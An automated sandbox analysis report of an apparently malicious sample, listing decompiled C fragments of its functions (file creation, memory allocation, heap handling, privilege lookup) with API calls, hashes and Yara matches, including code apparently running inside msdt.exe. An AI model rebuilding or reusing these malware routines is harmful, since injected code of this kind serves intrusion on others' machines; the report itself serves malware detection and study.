                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                      0x00419d6f
                                      0x00419d77
                                      0x00419dad
                                      0x00419db1

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                      0x00419f4f
                                      0x00419f57
                                      0x00419f79
                                      0x00419f7d

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419E8F, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419E8F(void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				long _t9;
				void* _t14;

				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t14, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                      0x00419e93
                                      0x00419e96
                                      0x00419e9f
                                      0x00419ea7
                                      0x00419eb5
                                      0x00419eb9

                                      APIs
                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 73d8280cdbd175acc7a22ddcd1b8067bd4b8cb9cc4edc79da90c89ad444e4314
                                      • Instruction ID: 78d17a804e16074688670281414f483b82c445e985956af87ee8a0228458600b
                                      • Opcode Fuzzy Hash: 73d8280cdbd175acc7a22ddcd1b8067bd4b8cb9cc4edc79da90c89ad444e4314
                                      • Instruction Fuzzy Hash: A3E0C271200104BFD720DFA5CC85EDB7B28EF44360F158559B90CAB242C530E500CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x00419e93
                                      0x00419e96
                                      0x00419e9f
                                      0x00419ea7
                                      0x00419eb5
                                      0x00419eb9

                                      APIs
                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                      0x00409a9b
                                      0x00409aa3
                                      0x00409aa5
                                      0x00409aaa
                                      0x00409aaf
                                      0x00409ac2
                                      0x00409ac7
                                      0x00409ad0
                                      0x00409adc
                                      0x00409aef
                                      0x00409af4
                                      0x00409af7
                                      0x00409b00
                                      0x00409b12
                                      0x00409b17
                                      0x00409b1c
                                      0x00000000
                                      0x00000000
                                      0x00409b1e
                                      0x00409b22
                                      0x00000000
                                      0x00000000
                                      0x00409b24
                                      0x00000000
                                      0x00409b22
                                      0x00409b26
                                      0x00409b29
                                      0x00409b2f
                                      0x00409b31
                                      0x00409b3c
                                      0x00409b41
                                      0x00409b44
                                      0x00409b51
                                      0x00409b5c
                                      0x00409b5e
                                      0x00409b64
                                      0x00409b68
                                      0x00409b6b
                                      0x00409b6b
                                      0x00409b72
                                      0x00409b75
                                      0x00409b7a
                                      0x00409b87
                                      0x00409ab6
                                      0x00409ab6
                                      0x00409ab6

                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                      • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                      • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                      • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A066, Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 24%
                                      			E0041A066(void* __ebx, void* __eflags, intOrPtr _a8, int _a12, long _a16, void* _a20) {
				intOrPtr _v117;
				char _t19;
				void* _t28;
				void* _t29;

				asm("enter 0x6ff0, 0xfe");
				_pop(_t33);
				if(__eflags != 0) {
					_t9 = _t29 + 0x6a;
					 *_t9 =  *((intOrPtr*)(_t29 + 0x6a)) + __ebx;
					__eflags =  *_t9;
					_push(0);
					_push(_t13 + 0xc7c);
					E0041A960(_t28);
					ExitProcess(_a12);
				}
				_v117 = _v117 + __ebx;
				_t16 = _a8;
				_push(_t29);
				_t5 = _t16 + 0xc74; // 0xc74
				E0041A960(_t28, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t19 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t19;
			}







                                      0x0041a066
                                      0x0041a06a
                                      0x0041a06d
                                      0x0041a0bb
                                      0x0041a0bb
                                      0x0041a0bb
                                      0x0041a0be
                                      0x0041a0c8
                                      0x0041a0ca
                                      0x0041a0d8
                                      0x0041a0d8
                                      0x0041a06f
                                      0x0041a073
                                      0x0041a079
                                      0x0041a07f
                                      0x0041a087
                                      0x0041a09d
                                      0x0041a0a1

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitFreeHeapProcess
                                      • String ID:
                                      • API String ID: 1180424539-0
                                      • Opcode ID: 95c219e14b7a2123644f0a02679c23a315b4ada85e4e6cadc7b0675a67c9ec7d
                                      • Instruction ID: 03a9c52b3d6c646ea41b56b40d2669e9b0209180d2facd98efced65e8deb33d2
                                      • Opcode Fuzzy Hash: 95c219e14b7a2123644f0a02679c23a315b4ada85e4e6cadc7b0675a67c9ec7d
                                      • Instruction Fuzzy Hash: 8BF0AFB56042047BC720EF65CC85ED77BA89F84310F15855AF9496B242C630E9148AA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E004082E8(void* __eax, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t22;
				int _t27;
				void* _t30;
				void* _t32;
				void* _t37;

				asm("o16 int3");
				asm("sti");
				asm("aas");
				_t37 = __eax - 0x55743da0;
				_t30 = _t32;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t14 = E0040ACD0(_t37, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t27 = _t15;
				if(_t27 != 0) {
					_t22 = _a8;
					_t15 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t39 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t27(_t22, 0x8003, _t30 + (E0040A460(_t39, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                      0x004082e8
                                      0x004082ea
                                      0x004082eb
                                      0x004082ec
                                      0x004082f1
                                      0x004082ff
                                      0x00408303
                                      0x0040830e
                                      0x0040831e
                                      0x0040832e
                                      0x00408333
                                      0x0040833a
                                      0x0040833d
                                      0x0040834a
                                      0x0040834c
                                      0x0040834e
                                      0x0040836b
                                      0x0040836b
                                      0x0040836d
                                      0x00408372

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: fe1817f8d2a4d75555eb946f5d904899bc82c527da7110fe87ecfd5fcaf17197
                                      • Instruction ID: 570143a64db4bd272f87036ae43dc6f1dbe486a344872f57eeaf6ccab9883068
                                      • Opcode Fuzzy Hash: fe1817f8d2a4d75555eb946f5d904899bc82c527da7110fe87ecfd5fcaf17197
                                      • Instruction Fuzzy Hash: B301D831A8032877E720A6A59D43FFE762CAB40F55F04411DFF04BA1C1D6A9691646EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                      0x004082f0
                                      0x004082ff
                                      0x00408303
                                      0x0040830e
                                      0x0040831e
                                      0x0040832e
                                      0x00408333
                                      0x0040833a
                                      0x0040833d
                                      0x0040834a
                                      0x0040834c
                                      0x0040834e
                                      0x0040836b
                                      0x0040836b
                                      0x00000000
                                      0x0040836d
                                      0x00408372

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                      • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                      • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                      • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A241, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 22%
                                      			E0041A241(WCHAR* __eax, void* __ebx, WCHAR* __ecx, void* __edi, void* _a1, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr* __esi;
				void* __ebp;
				int _t11;

				 *__ecx = __bh;
				if(__eflags >= 0) {
					asm("adc [ebx-0x3b7cf3b3], cl");
					asm("adc al, 0x52");
					_t11 = LookupPrivilegeValueW(__ecx, __eax, ??); // executed
					return _t11;
				} else {
					__al = __al + 0xbb;
					__eflags =  *(__ecx + __edi * 4 - 0x741374ab) & __cl;
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0xc));
					__esi = __eax + 0x978;
					__eax = E0041A9D0(__edx, __eax, __esi,  *((intOrPtr*)(__eax + 0xc)), 2);
					__edx = _a4;
					__eax =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a4, __ebp, 0x24f359a3);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}







                                      0x0041a242
                                      0x0041a244
                                      0x0041a1f4
                                      0x0041a1fa
                                      0x0041a200
                                      0x0041a204
                                      0x0041a246
                                      0x0041a24b
                                      0x0041a24d
                                      0x0041a251
                                      0x0041a253
                                      0x0041a256
                                      0x0041a25d
                                      0x0041a265
                                      0x0041a26a
                                      0x0041a26d
                                      0x0041a273
                                      0x0041a275
                                      0x0041a276
                                      0x0041a277
                                      0x0041a277

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                      • Instruction ID: 9dd89fefb67c748a01c5d95d8a62272fe27cb65a082a3cf406375c290d73bb1c
                                      • Opcode Fuzzy Hash: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                      • Instruction Fuzzy Hash: D3F0E57410A2D46BE322EB7498C04E6BF94DE821383284ADFDCE84B107C626959F8B52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A0A2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: c31de795ea200c1225d078e98873855cc87943d43a23b27787b39d3d2b6300bf
                                      • Instruction ID: d23a8a11c6d010ecddde116751eb4c1d8eb62083a8aedf19dd3b45afcbf351f3
                                      • Opcode Fuzzy Hash: c31de795ea200c1225d078e98873855cc87943d43a23b27787b39d3d2b6300bf
                                      • Instruction Fuzzy Hash: 78E092726053146BD7209FA49C89FD33BA8DF48760F018166FA5C6B642D635ED1086E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a07f
                                      0x0041a087
                                      0x0041a09d
                                      0x0041a0a1

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                      • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                      0x0041a047
                                      0x0041a05d
                                      0x0041a061

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                      • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E0041A1D0(intOrPtr _a4, WCHAR* _a12, void* _a16) {
				void* _v3;
				WCHAR* _t8;
				int _t9;
				WCHAR* _t10;
				void* _t13;

				_t6 = _a4;
				_t10 =  *(_a4 + 0xa18);
				E0041A960(_t13, _a4, _t6 + 0xc8c, _t10, 0, 0x46);
				_t8 = _a12;
				asm("adc [ebx-0x3b7cf3b3], cl");
				asm("adc al, 0x52");
				_t9 = LookupPrivilegeValueW(_t10, _t8, ??); // executed
				return _t9;
			}








                                      0x0041a1d3
                                      0x0041a1d6
                                      0x0041a1ea
                                      0x0041a1f2
                                      0x0041a1f4
                                      0x0041a1fa
                                      0x0041a200
                                      0x0041a204

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                      • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                      • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0040E451, Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0040E451(void* __eax, void* __ecx) {

				asm("das");
				return __eax;
			}



                                      0x0040e454
                                      0x0040e460

                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e9c0566f31717829e82057a326c3f4f627a4828fc8ec2e11b7a2bdb058ecb30
                                      • Instruction ID: c50915332b2b4cc7bd1d530fc76975f121dfbb6d707ed8f852dde9e44b139cde
                                      • Opcode Fuzzy Hash: 0e9c0566f31717829e82057a326c3f4f627a4828fc8ec2e11b7a2bdb058ecb30
                                      • Instruction Fuzzy Hash: 24B09902B8082802A0280C8AB802AB2E3A8C3832B3E0032ABAE08A30000083802A00A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: msdt.exe PID: 4616 Parent PID: 3424 msdt.exeCOMMON

                                      Executed Functions

                                      Function 00F49D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00F44B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00F44B87,007A002E,00000000,00000060,00000000,00000000), ref: 00F49DAD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: 14b91d6222d7a4fb15588dd0193f6a082001874f7c78da08fdd62f4da4c3cdfa
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 6CF0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00F49E0A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(00F44D42,5EB6522D,FFFFFFFF,00F44A01,?,?,00F44D42,?,00F44A01,FFFFFFFF,5EB6522D,00F44D42,?,00000000), ref: 00F49E55
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Offset: 00F30000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 351bf17eb1876d0f5e2a06a196838ca43312f214bcfe1f7101c47b56aa237127
                                      • Instruction ID: 7c09d18f3348a12afc6ce69a798e1538c22719bf642fc7c153f063a5710fd317
                                      • Opcode Fuzzy Hash: 351bf17eb1876d0f5e2a06a196838ca43312f214bcfe1f7101c47b56aa237127
